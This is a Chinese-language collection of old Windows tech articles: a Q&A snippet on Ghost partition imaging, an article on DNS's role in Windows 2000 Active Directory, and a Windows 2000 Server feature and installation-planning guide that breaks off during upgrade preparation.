    答：做分区镜像，是做成文件，选择不一样，是Ｐａｒｔｉｔｉｏｎ ｔｏ Ｉｍａｇｅ 不是Ｐａｒｔｉｔｉｏｎ ｔｏ Ｐａｒｔｉｔｉｏｎ，否则就是分区复制了。Ｐａｒｔｉｔｉｏｎ ｔｏ Ｉｍａｇｅ还会提示你输入文件名称。老实说，我从来没有试过如何恢复Ｇｈｏｓｔ误操作造成的问题。理论上是不可恢复的。越是功能好的硬盘工具，一旦造成破坏，后果也越严重，因此使用时要慎之又慎。现在只有听说ＰＱＭａｇｉｃ执行到一半死机，分区数据丢失，然后又用ＰＱＭａｇｉｃ恢复的事例。当然你也可到电脑之家ｈｔｔｐ／／ｗｗｗ．ｐｃｈｏｍｅ．ｎｅｔ／的软件下载区，下载硬盘工具里有关硬盘数据恢复的软件试试，现在我没条件测试！以后有空再说。


DNS在活动目录中的应用

《一键清理系统垃圾》

DNS在活动目录中的应用

在利用Windows NT4.0 构建的网络系统中，对每一台主机的唯一标识信息是它的NetBIOS名。系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址，从而实现信息通讯。在这样的网络系统内部，利用NetBIOS名实现信息通讯是非常方便、快捷的。但是在Internet上对一台主机的唯一标识信息是它的FQDN格式的域名（如www.microsoft.com），在Internet是利用DNS标准来实现将域名解析为相应IP地址。如果Windows NT4.0 构建的网络系统同Internet连通，则NT网络中的每一台主机也都有相应域名，其域名的解析是通过Windows NT4.0 所支持的DNS 服务来实现的。在Windows NT4.0 中配置和实现DNS 完全由人为手工来规划、设计和实现。由上述可见，在Windows NT4.0 网络系统中，每一台主机既有NetBIOS名又由域名，而实际意义基本相同。

在Windows 2000的活动目录中，最基本的单位是域（Domain），通过父域和子域的模式将域组织起来形成树，父域和子域之间是完全双向的信任关系，且信任关系传递。其组织结构同DNS系统类似。在活动目录中命名策略基本按照Internet标准来实现，遵照DNS和LDAP3.0两种标准，活动目录中的域和DNS 系统中的域采用完全相同的命名方式，即活动目录中的域名就是DNS域名。那么在活动目录中依赖于DNS作为定位服务，实现将名字解析为IP地址。所以当我们利用Windows 2000 构建活动目录时，必须同时安装配置相应的DNS，无论用户实现IP地址解析还是登录验证，都利用DNS在活动目录中定位服务器。

活动目录与DNS系统的紧密集成，意味着活动目录非常适合于Internet和Intranet环境。这也是微软创建适用于Internet的网络操作系统的思想的一种体现。企业可以把活动目录直接连接到Internet以简化与客户和合作伙伴之间的信息通讯。另外Windows 2000中的DNS服务允许客户使用DNS动态更新协议（RFC 2136）来动态更新资源记录。通过缩短手工管理这些相同记录的时间，提高DNS管理的性能。运行Windows 2000的计算机能动态地注册他们的DNS名称和IP地址。

由于活动目录与DNS已经集成在一起，因此在Windows 2000中NetBIOS名已经逐渐失去意义，与此相对应的WINS服务也处于慢慢被淘汰的过程中。在Windows NT中为了有效的发挥WINS的动态特性，我们通常将DNS与WINS 进行集成，这样能获得更准确的解析结果。而在Windows 2000中，由于支持动态更新协议（RFC 2136），这种集成也变得没有必要了。

任何事物的发展都是从简单到复杂，再由复杂演变为遵循统一的标准，容易被大众广泛接受。DNS这个由一系列解释请求（RFCs）标准组成的在Internet上广泛采用开放的协议，已经成为网络技术中的统一的标准化的规范。Windows 2000 的目标是在Internet和Intranet环境中得到广泛应用，那么它的名称解析模式就应该完全遵守单一的DNS标准。我想，Windows 2000的活动目录同DNS的紧密结合，为Windows 2000的广泛应用提供了很好的实现基础。

返回


WIN2000 Server的新功能及安装

《一键清理系统垃圾》

WIN2000 Server的新功能及安装

1、什么是Windows 2000
2、Windows 2000 Server 的新功能
3、Windows 2000 Server 系统需求和硬件兼容性检查；
4、Windows 2000 Server 安装前的注意事项；
5、安装 Windows 2000 Server；
6、Windows 2000 Server 安装的疑难排除；
7、开机启动时的疑难排除

    1、 什么是 Windows 2000
    Wondows 2000 是一个操作系统系列，集成了对客户/服务器模式和对等模式网络的支持。Windows 2000 产品家族的设计目的在于提高产品的可靠性，提供高层次的可用性及从小型网络到大型企业网的可扩展性。Windows2000 通过集成优化当前先进的网络、应用程序及WEB技术，令企业充分提高现有投资的价值从而降低了总体拥有成本。并为那些优秀的、具有重要作用的商务软件提供了最佳的运行环境。为当今迅猛发展的电子商务提供了一个崭新的具有高可靠性和高安全性的操作平台。

针对不同的用户和环境，Windows 2000 产品家族推出了四个版本：
    Windows 2000 Server： 针对工作组级的服务器用户，Windows 2000 Server 最重要的改进是在"活动目录"目录服务技术的基础上，建立了一套全面的、分布式的底层服务。此外，对最新硬件和设备的良好支持、集成式终端服务、内建虚拟专用网络（VPN）支持等。可以说 Windows 2000 Server 是完美的入门级解决方案，用于运行具有更高可靠性和可管理性的文件、打印、Intranet、通讯和基础架构服务器。
    最低配置要求：Pentium 兼容的 CPU≥133MHz 、64MB≤RAM≤4GB、空闲 HardDisk≥1.0GB、一台机器 ≤4个CPU
    Windows 2000 Professional：针对商业和个人用户。
    Windows 2000 Advanced Server
    Windows 2000 Advanced Server 操作系统提供了 Windows 2000 Server 的全部特性和优点。 此外，该操作系统还包含其他一些附加功能，用于增强电子商务和经营方式应用。针对企业级的高级服务器用户
    Windows 2000 Datacenter Server
针对大型数据仓库的数据中心服务器用户，微软推出的这个全新版本是功能最为强大的服务器操作系统，它支持 16 路对称多处理器系统以及高达 64GB 的物理内存。与 Windows 2000 Advanced Server 一样，它将群集和负载平衡服务作为标准的特性。另外，它为大型的数据仓库、经济分析、科学和工程模拟、联机交易服务等应用进行了专门的优化。
2、 Windows 2000 Server 的新功能概览

可扩展性和性能：

端终服务 用户可以在服务器上运行 Windows 程序，使用一台远程 PC 机、Windows 终端或非 Windows 设备通过局域网、宽域网或低带宽连接进行访问。在 Windows 2000 中，终端服务可以提升 20% 的可伸缩性，同时极大地改善了高带宽和低带宽连接的性能。
增强 ASP 性能 无脚本 ASP 文件的更具可伸缩性的 ASP 处理、改进的 ASP 流控制和 ASP 快速路径可以实现更快的网页处理。
多站点容留 Internet Information Services (IIS) 5.0 允许用户在保持高性能的同时在每个服务器上容留多个网站。
IIS CPU 节流 通过限制某 Web 应用程序或站点可以使用的 CPU 时间量，用户可以确保其他网站或非 Web 应用程序有更多可用的处理器时间，因而有更好的性能。
高吞吐率和带宽利用 通过对 1GB 网络的支持，Windows 2000 Server 在高性能网络上提供了高性能处理。更大的吞吐率无需增加网络带宽即可提升性能。

可靠性：

内核方式写保护 有助于防止错误代码干扰系统运行。
Windows 文件保护 防止新安装的软件替换重要的系统文件。

驱动程序证书 识别出那些已经通过 Windows 硬件质量实验室测试的设备驱动程序，如果用户企图安装无证书驱动程序，系统将给出警告。

IIS 应用程序保护 应用程序保护将 Web 应用程序和 Web 服务器的运行隔离开来，从而有效地防止某应用程序导致整个 Web 服务器的崩溃。

可用性：

作业对象 API（应用程序编程接口） 作业对象 API 具有设置处理器相似性、建立时间限制、控制进程属性及限定一组相关进程的内存使用等功能。应用程序可以使用这一 API 管理和控制相关系统资源。这一附加控制等级意味着：作业对象 API 可以防止应用程序降低总体系统可伸缩性。
应用程序证书 & DLL（动态链接库）保护 确认可以运行于 Windows 2000 Server 上的应用程序都经过微软公司的测试，以确保其高质量和高可靠性。该功能可以保护应用程序安装的 DLL，防止出现可以导致应用程序故障的冲突。

可用性：（续表）

多主复制 活动目录使用多主复制，以确保分布式网络配置的高可伸缩性和可用性。"多主"表示在网络中的每个目录副本都是全部其他副本的同位体；任何一个副本的改变都会影响到所有其他副本。
分布式文件系统（Dfs） 在一个网络上创建多个文件服务器和文件服务器共享的单个分级视图。DFs可以让用户更方便地定位文件，并通过在分布式服务器上保持多个文件副本的方法提高可用性。
磁盘限额 设置每个用户和每个卷的磁盘空间使用限额，以提供更高的磁盘空间可用性，同时有助于容量规划工作。
分级存储管理 自动将不常被访问的数据转移到低成本存储媒体上，为最常被访问的数据腾出磁盘空间。

安全性：

对最新安全标准的支持 使用最新标准建立安全的内联网、外联网和 Internet 站点，这些标准包括：56 位和 128 位 SSL/TLS、IPSec、Server Gated Cryptography （服务器门控加密技术）、摘要验证、Kerberos v5 验证和Fortezza。
活动目录集成 活动目录与支撑它的安全基础架构集成在一起，提供了用户、计算机和设备的安全管理集中点，这更简化了 Windows 2000 的管理操作。
Kerberos 身份验证 Windows 2000 完全支持 Kerberos v5 协议，提供对 Windows 资源及支持该协议的其他环境快速单登录。
公用密钥基础架构（PKI） Certificate Server （证书服务器）是公用密钥基础架构的关键组成部分，它允许客户向其用户发布自己的 x.509 证书，以获取诸如基于证书的身份验证、IPSec、安全电子邮件等功能。与活动目录的集成更简化了登记操作。

安全性：（续表）

智能卡支持 支持智能卡登录，用于实现坚固的敏感资源身份验证。
加密文件系统 通过数据加密增加硬盘上数据的安全性。即使在备份或压缩时该数据也保持加密状态。

安全的网络通信 使用 IPSec 标准跨整个企业网络的终端对终端加密通信。它非常适用于防止敏感内部通信被他人有意或无意地查看。活动目录提供了集中的策略控制，以使其具有实用价值。
路由选择和远程访问服务 通过拨号、租用线路和 Internet 连接将远程工作人员、远距离办公人员或部门办公室连接到企业通信网上。

模拟专用网络（VPN） 加密通信，实现通过 Internet 安全地连接远程用户和分支办公室的全功能网关。现在具有更新的 PPTP 支持，以及利用 L2TP （第二层隧道协议）实现的高级安全，并且 L2TP 同时经过 IPSec 的加密。

可操作性：

动态卷管理 在保持服务器联机、不影响终端用户的情况下添加新卷、扩充当前卷、添加或删除镜像、修复 RAID 5磁盘阵列。
磁盘碎片整理 经过一段时间后，磁盘碎片可能会严重影响一台繁忙的文件或 Web 服务器的性能。这些工具可以增加磁盘可用性和性能。
安全模式引导 用户可以使用安全模式引导系统，并在启动过程中通过改变默认设置或删除导致故障的驱动程序对系统进行故障检修。
备份和恢复 备份和恢复特性可以简化数据备份操作，同时也简化了出现硬盘故障时的数据恢复操作。Windows 2000 支持对硬盘或磁带

WEB特性：

Internet Information Services 5.0 (IIS) 集成 Web 服务可以让用户方便地容留和管理网站，以共享信息和创建 Web 商业应用，并将文件、打印、媒体和通信服务扩展到 Web。
ASP （活动服务器页面）编程环境 ASP 一直被认为是目前最简单、性能最好的 Web 服务器脚本编程环境。
XML 语法分析器 它可以创建允许 Web 服务器与 Microsoft Internet Explorer 及任何具有XML语法分析功能的服务器交换 XML 格式数据的应用程序。
Windows DNA 2000 Windows DNA 2000 （Windows 分布式interNet应用体系结构）是 Windows 平台的应用程序开发模型。使用 Windows DNA 2000 ，用户可以建立具有安全性、可靠性、高可伸缩性的解决方案，它们可以简化异种系统和应用程序的集成化工作。

WEB特性：（续表）

COM+ （组件对象模型+） COM+ 建立于组件对象模型的集成服务和特性之上，开发者可以利用 COM+ 更方便地使用任何工具创建和使用任何语言编写的软件组件。COM+ 包含可以实现可靠分布式应用程序的事务处理服务程序和信息列队服务程序。
多媒体平台 使用集成 Windows Mediasize=1>TM Services （Windows媒体服务），用户可以跨 Internet 和内联网配置和管理高质量数字媒体内容，从将活动和随选内容传送给最大数量的用户。
具有目录功能的应用程序 开发者可以使用许多标准界面编写应用程序，这些应用程序可以利用存放于活动目录服务中关于用户、其他应用程序和设备的信息。这样做可以实现丰富的动态应用程序，并且它们更易于开发和管理。活动目录的所有功能都可以通过 LDAP （轻量级目录访问协议）、ADSI （活动目录接口）和 MAPI 调用，用于扩展和集成其他应用程序、目录和设备。
Web 文件夹 通过使用 WebDAV （Web文档编辑和排版）实现拖放式 Web 出版，Web 文件夹将丰富的 Windows 功能带入 Web 世界。
Internet 打印 通过 Internet 向某 URL 发送打印任务。

3、系统和硬件设备要求
    要使系统的性能良好，请务必使安装 Windows 2000 Server 的计算机应符合下列需求：
§　133-MHz Pentium 或更快的中央处理单元 (CPU)。 每台计算机最多支持四个 CPU。
§　建议最少 256 MB RAM（最小支持 64 MB，最大支持 4 GB）。
§　硬盘分区必须具有足够的可用空间满足安装过程。需要的最少空间大约为 1 GB。可能会需要更大的空间，这要依靠下面的情形而定：
1. 要安装的组件：安装的组件越多，需要的空间也就越大。
2. 使用的文件系统：FAT 比其他文件系统多需要 100-200 MB 的磁盘空间，因为它的文件存储效率比 FAT32 格式及 NTFS 格式要低
3. 使用的安装方法：如果从网络安装，比从光盘安装多需要 100-200 MB 空间。
4. 分页文件的大小。
5. 升级比执行全新安装需要更大的空间，因为现有的用户帐户数据库在升级过程中，随着添加了 Active Directory 功能，它所占用的空间最大会扩大到原来的十倍。但在安装结束之后，操作系统（不包括用户帐户）使用的实际硬盘空间通常小于安装过程需要的可用空间。
§　VGA 或更高分辨率的显示器。
§　键盘。
§　鼠标或其他指针设备（可选）。
§　从光盘安装：
1. CD-ROM（12倍速或更高） 或 DVD 驱动器。
2. 高密度 3.5 英寸磁盘驱动器。如果计划通过安装媒体启动计算机，且系统不支持从 CD-ROM 启动时，则需要这种驱动器。如果计算机没有工作的操作系统并不支持从 CD-ROM 启动时，必须备有一个高密度 3.5 英寸磁盘驱动器。
§　从网络安装：
1. 一块或几块与 Windows 2000 兼容的网卡和相关电缆。
2. 为安装程序文件提供网络访问的服务器。
硬件设备兼容性
    为了使设备能在 Windows 2000 上正常工作，必须在计算机上加载相应设备的驱动程序软件。Windows 2000 安装程序会自动检查硬件和软件并报告任何潜在的冲突。为确保成功安装，在启动安装程序之前，请核对计算机的硬件是否与 Windows 2000 Server 兼容。
§　要核对硬件，请检查 Windows 2000 硬件兼容性列表 (HCL)。如果硬件没有列在其中，那么安装可能会不成功。（注意，微通道总线将不再被支持。）
§　要查看与 Windows 2000 一同发布的 HCL，请在 Windows 2000 光盘的 Support 文件夹中，打开 Hcl.txt 文件。更新的 HCL 可从下列网址找到：Microsoft Windows 硬件兼容性列表 Web 站点。http://www.microsoft.com/
§　要检查现有硬件设备是否有更新的驱动程序，以及是否有最新的系统 BIOS，及时的对硬件加以升级，特别是系统的 BIOS 程序。
§　如果系统中包含大容量硬盘控制器（SCSI卡, RAID卡、光纤适配器），检查它是否在硬件兼容性列表中，如果不在则需要从厂商出获得为 Windows 2000 开发的驱动程序，在安装过程中按提示按F6键安装相应的驱动，如果为安装提供 HAL 文件，请按 F5。否则系统将报错"无法访问的启动设备"。

4、 Windows 2000 Server 安装前的注意事项
升级或安装的确定
    在查阅系统需求和硬件兼容性和要查阅的重要文件后，在运行 Windows 2000 Server 安装程序之前，需要决定是升级还是执行全新安装。升级就是将 Windows NT 的某个版本替换为 Windows 2000 Server。全新安装与升级不同，意味着清除以前的操作系统，或将 Windows 2000 Server 安装在以前没有操作系统的磁盘或磁盘分区上。但不要在压缩的驱动器上进行 Windows 2000 的升级或安装，除非该驱动器使用 NTFS 文件系统压缩实用程序进行压缩。要在 DriveSpace 或 DoubleSpace 压缩的卷上运行 Windows 2000 安装程序，请先将其解压缩。
升级
    选择升级有多种原因。升级可简化配置，并且现有的用户、设置、组、权利和权限都能够保留下来。此外，也不需要重新安装文件和应用程序。但升级也要对硬盘做出很大的更改，所以建议运行安装程序之前备份硬盘数据。在安装了 Windows 2000 Server 后，还可能让计算机在某些时候运行其他的操作系统。但这样设置计算机，会由于文件系统的问题带来很大的复杂性。
    如果执行升级，安装程序会自动将 Windows 2000 Server 安装在当前操作系统所在的文件夹内。可以从下列版本的 Windows NT 升级：
    Windows NT 3.51－4.0 Server，如果用户的 Windows NT Server 是比 3.51 还早的版本，那么就无法直接升级到 Windows 2000 Server，必须先将它升级到 Windows NT Server 3.51 或 4.0。
安装
    如果打算执行一次全新安装，如果要安装到的磁盘分区包含想保留的应用程序，必需先对这些应用程序进行备份，在安装完 Windows 2000 Server 之后，再重新安装它们。如果想在以前包含 Windows 2000 Server 的分区上安装 Windows 2000 Server，并在"我的文档"中保存了一些文档，而且想保留它们，请先将 Documents and Settings 文件夹（一般位于根目录下）中的文档进行备份，在安装完成之后，再将这些文档复制到 Documents and Settings 文件夹内。
许可证方式的选择
    Windows 2000 Server 支持两种授权模式：每客户和每服务器。
§　如果选择了每客户模式，每台访问 Windows 2000 服务器的计算机都要求有自己的客户端访问许可证 (CAL)。使用一个 CAL，一个特定的客户端计算机可以连接到任意数量的 Windows 2000 服务器上。对于拥有超过一台 Windows 2000 Server 的公司来说，这是最常用的授权方法。
§　相反，每服务器授权意味着每一个与服务器的并发连接都需要一个单独的 CAL。这意味着在任何时候，这台 Windows 2000 服务器都可以支持固定数量的连接。例如，如果选择了每服务器客户端授权模式和五个并发连接，此 Windows 2000 Server 可以同时被五台计算机（客户端）所连接。这些计算机将不需要任何其他许可证。
§　只有一台 Windows 2000 服务器的中小企业通常选择每服务器授权模式。对于客户端计算机不可能被授权为 Windows 2000 网络客户端的 Internet 或远程访问服务器，这种模式也很有用。可以指定允许同时连接服务器的最大数量并拒绝任何额外的登录。
§　如果不能确定要使用哪种模式，可选择每服务器模式，因为无需花费任何费用，即可从每服务器模式更改为每客户模式。（但是，如果计划使用终端服务作为应用程序服务器，请参阅下面的段落。）
§　如果计划使用终端服务作为应用程序服务器（而不仅仅作为远程管理），授权模式通常是每客户，但"终端服务 Internet 连接程序"授权除外，因为此处的模式始终是每服务器。此外，如果要使用终端服务，需要安装以下的一两个组件：终端服务和（当作应用程序服务器的）终端服务授权。
是否使用多重启动
    计算机可以被设置为每次重新启动时，都可以在两个或多个操作系统之间选择。例如，可以将服务器设置为大部分时间运行 Windows 2000 Server，但有时也运行 Windows NT Server 4.0 以便支持早期的应用程序。但是，要这样做，需要选择特定的文件系统并可能需要最新的 Service Pack。在重新启动过程中，这些选项将会保持一定的时间，以便在两种系统之间做出选择。在重新启动过程中，如果没有做出选择，那么将运行默认的操作系统。
§　如果将计算机安装为包含 Windows 2000 和其他任何操作系统，那么必须将 Windows 2000 放在计算机的一个单独分区上。这就确保了 Windows 2000 不会覆盖其他操作系统需要的关键文件。
§　将计算机设置为在启动时可以在两个以上的操作系统间选择的原因是允许用户使用只在特定的操作系统上才能运行的应用程序。但是这样设置计算机也有一定的缺点：每个操作系统都占用大量的磁盘空间，并使兼容性问题变得复杂，尤其是文件系统的兼容性。此外，动态磁盘格式并不在多个操作系统上起作用。只有单独运行 Windows 2000 操作系统才能使用动态磁盘格式访问硬盘。
§　如果正在考虑安装包含多个操作系统的计算机，要确保始终可以有一种方式启动计算机（不论驱动程序或磁盘是否有问题），那么首先要考虑的是 Windows 2000 可用的各种故障恢复功能。其中的一个功能是安全模式，在这种模式下，Windows 2000 使用默认设置和数量最少的驱动程序来重新启动。利用安全模式的其他各种故障恢复功能，就没有必要将维护多个操作系统作为防止系统发生问题的一项安全措施。避免多个操作系统意味着也避免了文件系统兼容性问题和其他缺点。
可以和 Windows 2000 实现多重启动的操作系统及在实现时应注意的问题
  1. Windows NT 4.0
§　不要在包含 Windows 2000 和 Windows NT 的计算机上只使用 NTFS 文件系统。
§　确保 Windows NT 4.0 已使用最新版本的 Service Pack 更新过。
§　将每个操作系统安装在单独的驱动器或磁盘分区上。
§　当执行 Windows 2000 Server 的全新安装时（与升级不同），默认情况下，会把它安装在没有其他操作系统存在的分区上。在安装过程中，可以指定不同的分区。
§　不要将 Windows 2000 安装在压缩驱动器上，除非该驱动器是用 NTFS 文件系统压缩功能进行的压缩。
§　在各个系统所在的分区上安装它们各自使用的应用程序。如果想让程序运行在多个操作系统上，需要在每个操作系统分区上分别安装这些程序。
§　如果计算机位于 Windows NT 或 Windows 2000 域，计算机每个 Windows NT 4.0 Server 或 Windows 2000 Server 安装都必须使用不同的计算机名。
2. Windows 95 或 Windows 98
§　当运行 Windows 2000 时，压缩的 DriveSpace 或 DoubleSpace 卷都不可用。当只有 Windows 98 访问它时，没有必要解压缩 DriveSpace 或 DoubleSpace 卷。
§　要安装包含 Windows 95 和 Windows 2000 的计算机，请最后安装 Windows 2000。否则启动 Windows 2000 所需的重要文件就可能被覆盖。（对于包含 Windows 98 和 Windows 2000 的计算机，不需考虑安装操作系统的顺序。）
§　对于包含 Windows 95 和 Windows 2000 的计算机，主分区必须用 FAT 格式化。对于包含 Windows 95 OSR2 或 Windows 98 和 Windows 2000 的计算机，主分区必须使用 FAT 或 FAT32 格式化，不能用 NTFS。
  3. 多个 Windows 2000 安装
§　可以将多个 Windows 2000（Windows 2000 Professional或 Server）安装到一台服务器的多个分区上。但是，如果计算机参加某个 Windows 2000 域，每次安装都必须使用不同的计算机名。

文件系统的选择
    可以为 Windows 2000 Server 计算机的磁盘分区选择下列之一的文件系统： FAT 、FAT32 和NTFS。NTFS 是推荐的文件系统。FAT 和 FAT32 彼此相似，但与 FAT 相比，FAT32 可用在容量较大的磁盘上。
    NTFS
    NTFS 与 FAT 和 FAT32 相比，它是最强大的文件系统。Windows 2000 Server 包括新版本的 NTFS，它支持各种新功能：
§　Active Directory，可用来方便地查看和控制网络资源。
§　域，它是 Active Directory 的一部分，在简化管理的同时，依然可以使用域来调整安全选项。域控制器需要 NTFS 文件系统。
§　文件加密，它极大地增强了安全性。
§　可以对单个文件设置权限，而不仅仅是对文件夹进行设置。
§　稀疏文件，这些是由应用程序创建的非常大的文件，以这种方式创建的文件只受磁盘空间的限制。也就是，NTFS 只为写入的文件部分分配磁盘空间。
§　远程存储，通过使可移动媒体（如磁带）更易访问，从而扩展了硬盘空间。
§　磁盘活动恢复记录，可帮助用户在断电或发生其他系统问题时，尽快地还原信息。
§　磁盘配额，可用来监视和控制单个用户使用的磁盘空间量。
§　可更好地支持大驱动器，NTFS 支持的最大驱动容量比 FAT 支持的容量大得多，但随着驱动器容量得增大，NTFS 的性能并不随之降低，而 FAT 的性能却急速下降。
    安装程序可以方便地将分区转换为新版的 NTFS，即使该分区以前使用的是 FAT 或 FAT32 文件系统，这种转换可保持文件的完整性。如果不想保留文件，且有一个 FAT 或 FAT32 分区，建议使用 NTFS 格式化该分区，而不是转换 FAT 或 FAT32 文件系统。格式化分区会删除该分区上所有的数据，但使用 NTFS 格式化的分区与从 FAT 或 FAT32 转换来的分区相比，磁盘碎片较少，且性能更快。
FAT 和 FAT32
    有一种情况可能需要将 FAT 或 FAT32 选为用户的文件系统。如果需要让计算机有时运行早期的操作系统，有时运行 Windows 2000，则需要将 FAT 或 FAT32 分区作为硬盘上的主（或启动）分区。这是因为早期的操作系统（只有一个例外），都无法访问使用最新版 NTFS 格式化的分区。例外是带有 Service Pack 4 或更高版本的 Windows NT 4.0，它可以访问使用最新版 NTFS 格式化的分区，但也有一些限制。
硬盘分区的规划
    只有在执行全新安装，而不是执行升级时，需要在运行安装程序之前，规划磁盘分区。磁盘分区是一种划分物理磁盘的方式，以便每个部分都能够作为一个单独的单元使用。当在磁盘上创建分区时，可以将磁盘划分为一个或多个区域，以便将这些区域用诸如 FAT 或 NTFS 这样的文件系统格式化。主分区（或称为系统分区）是安装加载操作系统（如 Windows 2000）时所需文件的分区。主分区用特殊的文件系统格式化，分配的驱动器号为 C：。
§　如果计划在硬盘上删除或创建分区，请确保已备份了该磁盘的内容，因为这些操作将会破坏现有的数据。
§　在运行安装程序执行全新安装之前，需要决定安装 Windows 2000 Server 的分区大小。并没有固定的公式计算分区大小，基本规则就是为一同安装在该分区上的操作系统、应用程序及其他文件预留足够的磁盘空间。安装 Windows 2000 Server 的文件需要至少 1 GB 的可用磁盘空间，这在系统需求中已说明。建议要预留比最小需求多得多的磁盘空间。分区的大小为 2-4 GB 就可以，而对于更大的安装，则需要为其保留 10 GB 的磁盘空间。这样就为各种项目预留了空间，它们包括可选组件、用户帐户、Active Directory 信息、日志、未来的Service Pack、操作系统使用的分页文件以及其他项目。
§　在安装过程中，只需创建和规划要安装 Windows 2000 的分区。在安装完 Windows 2000 之后，可以使用磁盘管理来管理新建和已有的磁盘和卷。这包括利用未分区的空间创建新的分区；删除、重命名和重新格式化现有的分区；添加和卸掉硬盘以及在基本和动态格式之间升级和还原硬盘。

§　如果计划在此服务器上使用远程安装服务（以便可以在其他的计算机上安装操作系统），则需要一个单独的分区以备远程安装服务使用。此分区要使用 NTFS，因为远程安装服务的零备份存储功能要求用 NTFS。如果需要为远程安装服务创建新分区，请在安装之后再创建，并要保留足够的未分区磁盘空间以便创建它（推荐的磁盘空间为 2 GB，但可能不需要这么多，这要依据服务器做何用途而定）。同样，可以使用动态磁盘格式，它比基本格式在使用磁盘空间上更灵活。（但是，动态磁盘格式不会在包含多个操作系统的计算机上工作，只用Windows 2000 操作系统才能使用动态磁盘格式访问硬盘。）
    下表比较了三种文件系统支持的磁盘和文件大小。

NTFS FAT FAT32
推荐最小的容量为 10 MB，推荐实际最大的容量为 2 TB，并可支持更大的容量。
无法用在软盘上。 容量可从软盘大小到最大 4 GB。
不支持域。 容量从 512 MB 到 2 TB。在 Windows 2000 中，可以格式化一个不超过 32 GB 的 FAT3卷。
不支持域。
文件大小只受卷的容量限制。 最大文件大小为 2 GB。 最大文件大小为 4 GB。

TCP/IP、IP地址、域名解析的规划
    要使用 TCP/IP，请确保每个服务器都有 IP 地址，无论是动态的还是由软件自动提供的地址，或是用户获取和设置的静态地址均可以。因为这些地址仅仅是一些数字，很难记忆，所以同时还需为用户提供易于使用的名称。将此类名称映射到 IP 地址上的过程称作名称解析，它可以通过各种方法来完成，但主要是域名系统 DNS 和 Windows Internet 名称服务 (WINS)。
IP 地址的分配
    在安装过程中，Windows 2000 会自动分配 IP 地址，在安装完成后，请更改这个配置以便使用 DHCP或静态寻址。可以提供 IP 地址的方法如下：
§　对于在小型专用网络上的有限数量（五台或更少）的服务器，可以使用 Windows 2000 Server 中称作自动专用 IP 寻址 (APIPA) 的功能为服务器自动分配 IP 地址。
§　在结束安装后，可以继续使用自动分配的地址，或配置 DHCP 和/或静态 IP 地址。
§　如果网络包含多个子网，请选择一台服务器安装和配置 DHCP 组件。此 DHCP 服务器将为其他计算机提供动态 IP 地址。但这台服务器本身要有一个静态 IP地址（以便其他计算机可以找到它）。
§　在这种情况下，为了支持客户端，也需要一台或几台装有域名系统 DNS 组件和/或 Windows Internet 名称服务 (WINS) 组件的服务器。这样一台服务器或几台服务器就可以提供 DHCP、DNS 和/或 WINS 服务。任何提供这些服务的服务器都需要有静态 IP 地址（以便其他的计算机可以找到它）。
§　如果有一台特定的服务器可以使用户直接访问 Internet，则必须为这台服务器分配静态 IP 地址。可以从某个 Internet 服务提供商 (ISP) 或 Internet 网络信息中心 (InterNIC) 获得一个地址和相关的域名。
§　如果计算机有多块网卡，那么每个网卡都需要单独的 IP 地址。

名称解析
§　域名系统 (DNS)
    DNS 是一个用于在 Internet 和专用 TCP/IP 网络上定位计算机的分层命名系统。通常需要安装一个或多个 DNS 服务器。Internet 电子邮件、Web 浏览和 Active Directory 都需要 DNS。某些带有运行 Windows 2000 客户端的域也需要 DNS。当创建域控制器（或将某个服务器提升为域控制器）时，会自动安装 DNS，但当 Windows 2000 软件检测到域内已有 DNS 服务器时例外，或者，也可以明确地将 DNS 作为安装过程中或安装之后要安装的组件。
    如果在服务器上安装 DNS，将需要为该服务器指定一个静态 IP 地址。此外，还需要配置 DNS 客户端，以便它们能够识别这个 IP 地址。
§　Windows Internet 名称服务 (WINS)
    如果要支持运行 Windows NT 或任何早期 Microsoft 操作系统的客户端，则需要在域内的一个或几个服务器上安装 Windows Internet 名称服务 (WINS)。WINS 是一个可选的软件组件，在组件列表的网络服务下面。如果在服务器上安装 WINS，则需要为该服务器指定一个静态 IP 地址。此外还需要配置 WINS 客户端，以便使它们识别这个 IP 地址。
工作组和域的选择
    域是在同一个域名和安全范围内的一组帐户和网络资源的集合。工作组则是更基本的分组，它只是用来帮助用户在组内查找像打印机和共享文件夹这样的对象。域是所有网络都推荐的选择，但对于只有几个用户的网络例外。
§　利用 Windows 2000，服务器在域内可以是下面两种角色之一：域控制器，它含有给定域内用户帐户和其他 Active Directory 数据的副本；而成员服务器，它属于域但没有 Active Directory 数据的副本。（属于工作组，而不是属于域的服务器，称作独立服务器。）利用 Windows 2000，可以将服务器的角色在域控制器和成员服务器（或独立服务器）之间来回变换，即使在安装结束之后也可以这样做。但是建议在运行安装程序之前规划好域，并且只在必要的时候才更改服务器的角色。
§　在运行安装程序之前仔细考虑域控制器的名称是个好主意，一旦它成为域控制器后就无法更改它的名称了。如果要改名，必须先将它更改为成员或独立服务器，再更改名称，最后再次使它成为域控制器。
§　如果有多个域控制器，就可以比一个域控制器为用户提供更好的支持。多个域控制器可以自动备份用户帐户和其他 Active Directory 数据，并一同支持域控制器的功能（例如确认登录等）。

5、安装 Windows 2000 Server 中文版
准备安装
    升级安装
    在将系统升级到 Windows 2000 Server 的准备阶段，要执行以下几个基本步骤：备份文件、将驱动器解压缩、禁用磁盘镜像、切断不间断电源 (UPS) 设备并检查计算机上的应用程序。
§　备份文件
    在升级之前，建议备份当前的文件。可以将这些文件备份到磁盘、磁带驱动器或网络中的其他计算机上。
§　将驱动器解压缩
    在升级到 Windows 2000 时，要将所有的 DriveSpace 或 DoubleSpace 卷解压缩。不要在压缩的驱动器上将系统升级到 Windows 2000，除非这个驱动器是用 NTFS 文件系统的压缩功能执行的压缩。
§　禁用磁盘镜像
    在升级之前，如果目标计算机上安装有磁盘镜像，那么在运行安装程序之前要禁用它。在完成安装后，再重新启动磁盘镜像。
§　切断 UPS 设备
    如果目标计算机与不间断电源 (UPS) 相连，那么在运行安装程序之前要切断连接的串行电缆。因为 Windows 2000 安装程序会试图自动检测连接到串行端口上的设备，如果不切断，UPS 设备会在检测过程中产生问题。
§　检查应用程序
    在启动 Windows 2000 Server 安装程序之前，请务必阅读 Readme.doc 文件（在 Windows 2000 Server 光盘的根目录下）的关于应用程序一节。查找在运行安装程序之前，需要禁用或删除应用程序的信息 。

全新安装
    在将系统升级到 Windows 2000 Server 的准备阶段，要执行以下几个基本步骤：备份文件、将驱动器解压缩、禁用磁盘镜像并切断不间断电源 (UPS) 设备。
§　备份文件
